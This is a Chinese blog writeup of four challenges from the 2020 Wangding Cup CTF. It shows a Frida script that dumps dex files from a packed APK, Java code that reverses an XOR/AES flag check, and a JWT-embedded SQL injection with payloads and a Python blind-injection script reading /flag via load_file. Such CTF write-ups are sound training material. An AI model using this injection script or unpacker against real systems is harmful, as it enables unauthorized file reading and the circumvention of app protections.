2020网鼎杯玄武组部分题writeup(签到/vulcrack/java/js_on)

最新推荐文章于 2022-10-16 01:44:47 发布
最新推荐文章于 2022-10-16 01:44:47 发布
阅读量2.8k 收藏 4
点赞数 3
分类专栏: 渗透测试 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w1590191166/article/details/106314499
版权

签到题

思路

浏览器F12,调取ajax,输入队伍token,获取flag

过程

(1)浏览器进入F12查看js,看到game_manage.js这个js,看名字像是控制游戏的
在这里插入图片描述
(2)进入js,通过搜索“move”和“ajax”等关键字,以及if (f.value == 1024)条件,看到如下代码,是给后端发请求并弹窗
在这里插入图片描述
(3)复制该段代码到console,执行,浏览器弹窗,输入战队token,成功获取flag
在这里插入图片描述
在这里插入图片描述

vulcrack

思路

脱壳APK获取flag

过程

Step 1: 下载apk文件,在frida中使用自己编写的脚本进行脱壳
Step 2: 在jadx中打开脱壳后拿到的dex文件
在这里插入图片描述
Step 3:在jadx中观察源码发现,有个名为Flag的类,进入查看源码
在这里插入图片描述
Step 4:执行flag中的calcFlagFirstStep()和calcFlagSecondStep()
在这里插入图片描述
Step 5:把两个函数的运行结果拼起来,拿到flag并提交
附上frida利用脚本

'use strict';

function LogPrint(log) {
    var theDate = new Date();
    var hour = theDate.getHours();
    var minute = theDate.getMinutes();
    var second = theDate.getSeconds();
    var mSecond = theDate.getMilliseconds()

    hour < 10 ? hour = "0" + hour : hour;
    minute < 10 ? minute = "0" + minute : minute;
    second < 10 ? second = "0" + second : second;
    mSecond < 10 ? mSecond = "00" + mSecond : mSecond < 100 ? mSecond = "0" + mSecond : mSecond;

    var time = hour + ":" + minute + ":" + second + ":" + mSecond;
    console.log("[" + time + "] " + log);
}

function getAndroidVersion() {
    var version = 0;

    if (Java.available) {
        var versionStr = Java.androidVersion;
        version = versionStr.slice(0, 1);
    } else {
        LogPrint("Error: cannot get android version");
    }
    LogPrint("Android Version: " + version);
    return version;
}

function getFunctionName() {
    var i = 0;
    var functionName = "";

    // Android 4: hook dvmDexFileOpenPartial
    // Android 5: hook OpenMemory
    // after Android 5: hook OpenCommon
    if (getAndroidVersion() > 4) { // android 5 and later version
        var artExports = Module.enumerateExportsSync("libart.so");
        for (i = 0; i < artExports.length; i++) {
            if (artExports[i].name.indexOf("OpenMemory") !== -1) {
                functionName = artExports[i].name;
                LogPrint("index " + i + " function name: " + functionName);
                break;
            } else if (artExports[i].name.indexOf("OpenCommon") !== -1) {
                functionName = artExports[i].name;
                LogPrint("index " + i + " function name: " + functionName);
                break;
            }
        }
    } else { //android 4
        var dvmExports = Module.enumerateExportsSync("libdvm.so");
        if (dvmExports.length !== 0) { // check libdvm.so first
            for (i = 0; i < dvmExports.length; i++) {
                if (dvmExports[i].name.indexOf("dexFileParse") !== -1) {
                    functionName = dvmExports[i].name;
                    LogPrint("index " + i + " function name: " + functionName);
                    break;
                }
            }
        } else { // if not load libdvm.so, check libart.so
            dvmExports = Module.enumerateExportsSync("libart.so");
            for (i = 0; i < dvmExports.length; i++) {
                if (dvmExports[i].name.indexOf("OpenMemory") !== -1) {
                    functionName = dvmExports[i].name;
                    LogPrint("index " + i + " function name: " + functionName);
                    break;
                }
            }
        }
    }
    return functionName;
}

function getProcessName() {
    var processName = "";

    var fopenPtr = Module.findExportByName("libc.so", "fopen");
    var fopenFunc = new NativeFunction(fopenPtr, 'pointer', ['pointer', 'pointer']);
    var fgetsPtr = Module.findExportByName("libc.so", "fgets");
    var fgetsFunc = new NativeFunction(fgetsPtr, 'int', ['pointer', 'int', 'pointer']);

    var pathPtr = Memory.allocUtf8String("/proc/self/cmdline");
    var openFlagsPtr = Memory.allocUtf8String("r");

    var fp = fopenFunc(pathPtr, openFlagsPtr);
    if (fp.isNull() === false) {
        var buffData = Memory.alloc(128);
        var ret = fgetsFunc(buffData, 128, fp);
        if (ret !== 0) {
            processName = Memory.readCString(buffData);
            LogPrint("processName " + processName);
        }
    }
    return processName;
}

function arraybuffer2hexstr(buffer) {
    var hexArr = Array.prototype.map.call(
        new Uint8Array(buffer),
        function (bit) {
            return ('00' + bit.toString(16)).slice(-2)
        }
    );
    return hexArr.join(' ');
}

function checkDexMagic(dataAddr) {
    var magicMatch = true;
    var magicFlagHex = [0x64, 0x65, 0x78, 0x0a, 0x30, 0x33, 0x35, 0x00];

    for (var i = 0; i < 8; i++) {
        if (Memory.readU8(ptr(dataAddr).add(i)) !== magicFlagHex[i]) {
            magicMatch = false;
            break;
        }
    }

    return magicMatch;
}

function checkOdexMagic(dataAddr) {
    var magicMatch = true;
    var magicFlagHex = [0x64, 0x65, 0x79, 0x0a, 0x30, 0x33, 0x36, 0x00];

    for (var i = 0; i < 8; i++) {
        if (Memory.readU8(ptr(dataAddr).add(i)) !== magicFlagHex[i]) {
            magicMatch = false;
            break;
        }
    }

    return magicMatch;
}

function dumpDex(moduleFuncName, processName) {
    if (moduleFuncName !== "") {
        var hookFunction;
        if (getAndroidVersion() > 4) { // android 5 and later version
            hookFunction = Module.findExportByName("libart.so", moduleFuncName);
        } else { // android 4
            hookFunction = Module.findExportByName("libdvm.so", moduleFuncName); // check libdvm.so first
            if (hookFunction == null) {
                hookFunction = Module.findExportByName("libart.so", moduleFuncName);  if not load libdvm.so, check libart.so
            }
        }
        Interceptor.attach(hookFunction, {
            onEnter: function (args) {
                var begin = 0;
                var dexMagicMatch = false;
                var odexMagicMatch = false;

                dexMagicMatch = checkDexMagic(args[0]);
                if (dexMagicMatch === true) {
                    begin = args[0];
                } else {
                    odexMagicMatch = checkOdexMagic(args[0]);
                    if (odexMagicMatch === true) {
                        begin = args[0];
                    }
                }

                if (begin === 0) {
                    dexMagicMatch = checkDexMagic(args[1]);
                    if (dexMagicMatch === true) {
                        begin = args[1];
                    } else {
                        odexMagicMatch = checkOdexMagic(args[1]);
                        if (odexMagicMatch === true) {
                            begin = args[1];
                        }
                    }
                }

                if (dexMagicMatch === true) {
                    LogPrint("magic : " + Memory.readUtf8String(begin));
                    //console.log(hexdump(begin, { offset: 0, header: false, length: 64, ansi: false }));
                    var address = parseInt(begin, 16) + 0x20;
                    var dex_size = Memory.readInt(ptr(address));
                    LogPrint("dex_size :" + dex_size);
                    var dex_path = "/data/data/" + processName + "/" + dex_size + ".dex";
                    var dex_file = new File(dex_path, "wb");
                    dex_file.write(Memory.readByteArray(begin, dex_size));
                    dex_file.flush();
                    dex_file.close();
                    LogPrint("dump dex success, saved path: " + dex_path + "\n");
                } else if (odexMagicMatch === true) {
                    LogPrint("magic : " + Memory.readUtf8String(begin));
                    //console.log(hexdump(begin, { offset: 0, header: false, length: 64, ansi: false }));
                    var address = parseInt(begin, 16) + 0x0C;
                    var odex_size = Memory.readInt(ptr(address));
                    LogPrint("odex_size :" + odex_size);
                    var odex_path = "/data/data/" + processName + "/" + odex_size + ".odex";
                    var odex_file = new File(odex_path, "wb");
                    odex_file.write(Memory.readByteArray(begin, odex_size));
                    odex_file.flush();
                    odex_file.close();
                    LogPrint("dump odex success, saved path: " + odex_path + "\n");
                }
            },
            onLeave: function (retval) {}
        });
    } else {
        LogPrint("Error: cannot find correct module function.");
    }
}

//start dump dex file
var moduleFucntionName = getFunctionName();
var processName = getProcessName();
if (moduleFucntionName !== "" && processName !== "") {
    dumpDex(moduleFucntionName, processName);
}

java

思路

反编译java源码,逆推获取flag

过程

Step 1: 通过jadx工具进行反编译出代码如下:
在这里插入图片描述
Step 2: 导出之后,再导入Android Studio,查看代码逻辑,改了少部分反编译错误代码后运行:
在这里插入图片描述
在这里插入图片描述
Step 3: 查看代码逻辑,发现是用户输入值后,通过补位、AES运算和位运算后,再进行base64编码,与值
“VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3”相等,则用户的输入就是flag,因此下面进行逆运算。

Step 4:如上所说,要逆运算,首先先进行base64解码,代码如下:
public static byte[] decode(byte[] bArr){
return Base64.decode(bArr,Base64.NO_WRAP);
}

Step 5: 原来程序的位运算代码逻辑如下:
public byte[] a(byte[] bArr, int i, int[] iArr) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
System.out.println(“data.length”);
System.out.println(length);
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
for (int i3 = 0; i3 < bArr.length; i3++) {
bArr[i3] = (byte) (bArr[i3] ^ iArr[i3]);
}
return bArr;
}
由于该位运算(异或运算)可逆,可写出逆运算代码逻辑如下:
/**
*
* @param i = 22
* @param iArr = {214, 144, 233, 254, 204, 225, 61, 183, 22, 182, 43, 103, 20, 194, 40, 251, 44, 5, 43, 103, 154, 118, 42, 190, 4, 195, 43, 103, 170, 68, 19, 38, 73, 134, 43, 103, 153, 156, 66, 80, 244, 145, 80, 103, 239, 152, 122, 98, 50, 214};
*/
public byte[] a1(byte[] bArr, int i, int[] iArr) {
if (bArr == null || bArr.length == 0) {
return null;
}
int length = bArr.length;
for (int i3 = 0; i3 < bArr.length; i3++) {
bArr[i3] = (byte) (bArr[i3] ^ iArr[i3]);
}
for (int i2 = 0; i2 < length; i2++) {
bArr[i2] = (byte) (bArr[i2] ^ i);
}
return bArr;
}

Step 6: 接下来进行AES逆运算,即AES解密,AES秘钥在源代码中存在:
/**
* @param bArr 密文,待解密
* @param bArr2 密钥:aes_check_key!@#
**/
public static byte[] aesDecrypt(byte[] bArr, byte[] bArr2) {
try {
SecretKeySpec secretKeySpec = new SecretKeySpec(bArr2, “AES”);
Cipher instance = Cipher.getInstance(“AES/ECB/NoPadding”);
instance.init(Cipher.DECRYPT_MODE, secretKeySpec);
byte[] decrypt = instance.doFinal(bArr);
System.out.println(“AES解密:”+ Arrays.toString(decrypt));
return decrypt;
} catch (Exception e) {
e.printStackTrace();
return new byte[0];
}
}

Step 7: 结合以上三步:
(1)首先将
“VsBDJCvuhD65/+sL+Hlf587nWuIa2MPcqZaq7GMVWI0Vx8l9R42PXWbhCRftoFB3”进行base64解码,调用我们Step4中写好的decode函数
(2)之后进行位运算的,调用我们Step5中写好的异或的逆运算函数:a1
(3)最后进行aes解密,调用我们Step6中写好的aesDecrypt函数
写出整个还原flag的函数代码为:
public void test(){
byte[] base64Decode = b64.decode(b.getBytes());
System.out.println(“base64Decode:”+Arrays.toString(base64Decode));
this.d = new d();
byte[] a1 = this.d.a1(base64Decode, 22, this.c);
System.out.println(“位运算:”+Arrays.toString(a1));
byte[] aesSrc = e.aesDecrypt(a1, a.getBytes());
System.out.println(“ASE解密后的字符串:”+new String(aesSrc));
}
(4)该test函数运行后,结果如下:
在这里插入图片描述
(5)观察到flag后有多余的字符,是由于原始运算的补位形成的,咱们就把最后多余的6位去掉,在test函数中加上补位运算的逆运算后代码如下:
public void test(){
byte[] base64Decode = b64.decode(b.getBytes());
System.out.println(“base64Decode:”+Arrays.toString(base64Decode));
this.d = new d();
byte[] a1 = this.d.a1(base64Decode, 22, this.c);
System.out.println(“位运算:”+Arrays.toString(a1));
byte[] aesSrc = e.aesDecrypt(a1, a.getBytes());
System.out.println(“ASE解密后的字符串:”+new String(aesSrc));
System.out.println(aesSrc.length);
byte[] target = new byte[aesSrc.length - 6];
System.arraycopy(aesSrc,0,target,0,target.length);
System.out.println(“最终字符串:”+new String(target));
}
(6)以上完整的test函数运算结果如下,获取flag:
在这里插入图片描述

js_on

思路

jwt中sql注入读文件获取flag

过程

Step 1:打开url:
http://xx.changame.ichunqiu.com/login.html,弱口令:admin/admin成功登录
在这里插入图片描述
Step 2:回到登录页,发现有个注册地方,可成功注册未注册过的账号,如:admin2/admin2
在这里插入图片描述
Step 3:登录刚刚自己注册的admin2账号,发现输出不一样,说x明后端肯定判断了当前账号是否为admin,如果不是,就输出hello ……等字样。当前地址为:http://xx.cloudgame2.ichunqiu.com/index.php
在这里插入图片描述
Step 4:浏览器F12查看cookie,看到有个token字段,且为JWT格式,说明该系统通过JWT来标识用户,且联想到页面上显示的key值为JWT的token。
在这里插入图片描述
Step 5:根据JWT知识,将token内容复制到https://jwt.io/#debugger网站进行base64解码如下,可看到payload字段的user值为admin2:
在这里插入图片描述
Step 6:Step 3中提到
http://xxx.cloudgame2.ichunqiu.com/index.php页面对当前用户进行了判断,从而决定页面输出内容,因此猜测user字段存在sql注入漏洞,进行尝试。
https://jwt.io/#debugger 右下角填入secret(即页面上回显的key值),此处user参数肯定为字符型,开始构造攻击语句,左边获取对应JWT。
Step7:(1)构造攻击payload:
{
“user”: “admin’//and//1=2#”,
“news”: “key:xRtYMDqyCCxYxi9a@LgcGpnmM2X8i&6"
}
获取左边JWT:
在这里插入图片描述
burpsuite发包,响应如下:
在这里插入图片描述
(2)构造攻击payload:
{
“user”: “admin’//and//1=1#”,
“news”: "key:xRtYMDqyCCxYxi9a@LgcGpnmM2X8i&6”
}
获取左边JWT:
在这里插入图片描述
burpsuite发包,响应如下:
在这里插入图片描述

(3)根据两个不通响应,能够确认此处存在sql注入漏洞

Step8:构造攻击代码:“user”: "aa’-- “和"user”: "'select"获取对应JWT,发送请求包发现回包存在“Get Out Hacker!!!”字样,说明后端有做攻击检测。

在这里插入图片描述
Step9:结合之前回包的“

这里是你的信息:???Why there is No Message for you?

”,通过substr+loadfile函数,获取/flag文件中内容,构造python利用脚本如下:

coding:utf-8

import jwt
import requests

url = 'http://xxx.changame.ichunqiu.com/'
data = ''
dict = '0123456789abcdeflg-{}'
for i in range(1, 60):
	for j in dict:
		encoded_jwt = jwt.encode({"user":"admin'/**/and/**/load_file('/flag')/**/regexp/**/'^" + data + j + "'#","news":"key:xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6"},'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6',headers={"alg":"HS256","typ":"jwt"})
		cookies = {
			'UM_distinctid':'',
			'Hm_lvt_2d0601bd28de7d49818249cf35d95943':'',
			'__jsluid_h':'',
			'token':encoded_jwt
		}
		try:
			res = requests.get(url=url,cookies=cookies,timeout=3)
			if 'xRt*YMDqyCCxYxi9a@LgcGpnmM2X8i&6' in res.content:
				data += j
				print(str(data))
				break
		except Exception as e:
			print(str(e))

在这里插入图片描述

ATpiu
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022网鼎杯初赛玄武
10-18
2022网鼎杯初赛玄武
CTF-2020网鼎杯-玄武-web-js_on知识回顾
山下南徒的博客
07-10 852
CTF-2020网鼎杯-玄武-web-js_on知识回顾 思路:弱口令登录获得jwt_key,解开jwt,user参数有盲注,修改jwt并装进行注入,获取flag。 涉及知识: MySQL注入 JWT安全基础 Python的requests库 Python的PyJWT库 按时间盲注写的脚本如下: #!/usr/bin/python python3 #-*-coding:utf-8-*- #CTF_2020网鼎杯_玄武_Web_js_on import requests,jwt,time ur
菜鸟爬虫自由练习一
heart_FW的博客
10-20 549
本次是对前一次爬虫代码的练习。 内容估计对从事互金的同学有些帮助,如能起到一点帮助作用,深感荣幸。这也是第一次自行尝试构建爬虫。当然起步还是捡容易的做,毕竟在尝试这个网站之前,另一个网站被反爬了暂时还无解。hhhhh 同样的在代码部分dic_c和dic_h部分做了删减处理,请使用的同学替换为自己电脑的heager和cookies,查看路径newwork–doc-刷新页面–name找到右边的header和cookies,相信聪明的你百度下很快能找到的。 第一部分内容为源代码构建,爬取的是总平台数据信息,结果来
js逆向--jsl马蜂窝
Harden13_的博客
08-10 427
加速乐相对来说还是很简单的,只需要记住以下步骤还是很容易手撕的。第一次请求时候,记得获取它的 set-cookie 值。携带第一次请求生成和返回的 Cookie 去请求第二次。携带第二次请求生成和返回的 Cookie 去请求第三次。跟着 上来就是一把梭 将第三次的代码处理即可。各位大佬觉得本文写的不错的话,可以一键四连哦。..................
python 破解js加密cookie,突破521错误-还没有成功,后面有时间再看
hugh_博客标题
08-09 4354
参考1:爬虫遭遇状态码521陷阱 破解js加密cookie,参考代码:xiantang/Spider/tree/master/Anti_Anti_Spider_521 参考2:域名信息521js破解 工具1:代码格式化工具 | | | 我是找IP代理时遇到的,http://www.66ip.cn/areaindex_1/1.html, 后面慢慢发现,有很多相关项: 浏览器; IP; 时间; O...
某蜂窝(加速乐) - js逆向
活捉一只小菜鸟的博客
04-22 855
注:本篇博客仅供学习使用,请勿用做其他商业用途,如有侵权,请联系本菜鸟 偶遇创宇盾的加速乐,就是下图这种 废话不多说,直接上逻辑 同一个页面,请求了三次才成功,前面两次状态码都是返回的521 第一次521请求返回一个cookie(__jsluid_h1) ,并且从返回的script代码中可直接提取出请求第二次请求所需的cookie(__jsl_clearance1) 第二次521请求需要的cookie为__jsluid_h1和__jsl_clearance1,从返回的js代码中加密得到第三次所需的__js
Crypto 2020网鼎杯 you raise me up Writeup (离散对数)
01-20
关键点:离散对数、同余运算 知识点:Antigonae整理的相关概念 看不懂-.-以后再研究,简单理解为: 普通对数为 a ** x=b (求x=logab) 离散对数为 a ** x=b % p 先会用SageMath~ 目 #!/usr/bin/env python ...
网鼎杯writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用[email protected]
【CTF WriteUp】2020网鼎杯第一场部分
01-20
中,模数n = 2 ** 512,所以此处可以使用Pohlig-Hellman算法逐渐升模求出flag。该算法的原理核心,在于已知x % 2 ** k的情况下,如何求出x % 2 ** (k+1)。 (i)当k = 0时,2 ** k = 1,显然有bytes_to_len(flag) ...
Reverse 2020网鼎杯 bang Writeup(安卓简单的加壳)
01-03
记录下踩过的坑提醒下自己 我用到的工具: jadx DexExtractor ...java -jar apktool_2.4.1.jar b signed apk在 signed/dist 里,install 报错 INSTALL_PARSE_FAILED_NO_CERTIFICATES,需要签名,用命令
JS逆向之企业信息x系统Cookie传递
onejane
10-16 532
篇幅有限 完整内容及源码关注公众号:ReverseCode,发送 冲 目标 http://www.gsxt.gov.cn/corp-query-entprise-info-xxgg-100000.html 分析 POST http://www.gsxt.gov.cn/affiche-query-area-info-paperall.html?noticeType=21&areaid=100000&noticeTitle=&regOrg=110000 参数: noticeType
状态码412,521,cookie包含__jsl_clearance参数
weixin_44388373的博客
08-21 1757
状态码412,521,cookie包含__jsl_clearance=参数 最近做爬虫碰见状态码为412和521的网站,分享一下经验 样例网站: http://kjj.hefei.gov.cn/public/column/2971?sub=&catId=6718761&nav=3&action=list&type=4&pageIndex=1 1.headers参数 用postman检测了一下,发现只需要UA,Host,Cookie参数 ![在这里插入图片描述](htt
nginx配置、反向代理缓存、负载均衡
weixin_34233618的博客
12-06 200
一、nginx基本配置nginx开启文件目录浏览功能(web上显示目录) 1location / { 2 root /data/www/file //指定实际目录绝对路径; 3 autoindex on; //开启目录浏览功能; 4 autoindex...
网鼎杯玄武web js_on
Fisher
05-27 815
前置知识 环境出自ctfhub 本博客用于自己学习记录 拿到目: 有一个登陆窗口,看着像注入,但是注入的时候被出者疯狂嘲讽 可以通过admin/admin成功登陆,登陆之后存在key值,当时打网鼎的时候不知道key值怎么用,后来了解到了用在token,目叫js_on,根据大佬的指点 本考的知识点是jwt 现在说一下jwt JWT的原则是在服务器身份验证之后,将生成一个JSON对象并将其发送回用户,之后,当用户与服务器通信时,客户在请求中发回JSON对象。服务器仅依赖于这个JSON对象来标识用户。为了
网鼎杯2020-玄武签到
自在如风
05-21 2275
目分析 游戏,该游戏操作通过JavaScript代码进行反馈 查看JavaScript源码,找到游戏结束部分的关键代码 解过程 F12进入浏览器控制台,查看JavaScript源码 找到游戏操作部分js文件,以及游戏操作结束发送数据到后端的代码,通过ajax与后端交互,发送token,返回数据 尝试将该段代码写入控制台执行 输入战队token,控制台console.log(data)输出 flag ...
2020网鼎杯大赛部分
weixin_43070384的博客
05-14 5678
1. boom 解压之后会发现是一个可以运行的程序 运行之后会出现一个MD5乱码,这个我们通过解码会得到en5oy,然后我们输入进去会提示你进入下一关。 输入进去后我们发现方程,我们解方程得到X=74,Y=68,Z=31 然后得到下列一元二次方程,这个方程我用的python代码算出来的得到89127561,但是我们输入进去后,会发现谈谈弹窗消失,然后我们去看这个程序的代码。 下面是部分代码截图,我们发现flag的拼接方式 拼接过后得到flag{en5oy_746831_89127561}。自
CTF 2020 第二届 网鼎杯 第一道 Misc 签到
狸匪的博客
05-10 2271
这是我在超正式的比赛(网鼎杯)中做出的第一道CTF(甭提有多高兴了) 目地址: http://29ec1ba945124a9b827414b38f4e29030d0e0910e64e466c.cloudgame2.ichunqiu.com/ 这道很简单 首先一上来来一个小游戏: 点击GUESS 开始游戏 :选择世界上CTF 战队名称与图片 一共15道 都选择正确的话会提示输入本战队的 TOKEN 输入 然后就跳转到这个页面了 此时我们并没有什么思路,只知道给了我们flag 按下F1
2020网鼎杯玄武移动安全wp
weixin_43632667的博客
05-27 528
ps:目是别人发给我的,本人太菜没资格参加这个比赛 vulcrack 首先jadx打开,发现是一个壳程序 libjiabu.so和包名这些很容易看出是一个360壳,这里采用最近各大论坛比较流行的frida-dexDump进行脱壳 讲道理这挺恶心人的,我用安卓模拟器打开的时候无法运行,感觉可能是该360壳存在模拟器检测,那么没办法只有使用真机进行操作,然鹅我的真机的比较辣鸡,启动frida经常报错,其中甚至考虑过手动脱壳,最后折腾半天终于完成脱壳。 脱壳过程 启动frida_server: cd /.
frida 常用的一些demo 打印native 函数的堆栈 参数,返回值 等
qq_36535153的博客
09-14 7265
import frida, sys jscode = “”" var str_name_so = “libxxxx.so”; //要hook的so名 var str_name_func = “getxxxx”; //要hook的函数名 var n_addr_func = Module.findExportByName(str_name_so , str_name_func); console.log(“func ShowMessageBoxID addr is —” + n_addr
全部1000元 域名_DataCon 2020 DNS恶意域名分析方向冠军writeup
最新发布
05-24
恭喜您获得域名_DataCon 2020 DNS恶意域名分析方向冠军!以下是您的writeup: 赛概述: 本次比赛的任务是对一恶意域名进行分析。每个参赛者需要对提供的数据集进行分析,从中筛选出恶意域名,并对这些域名进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值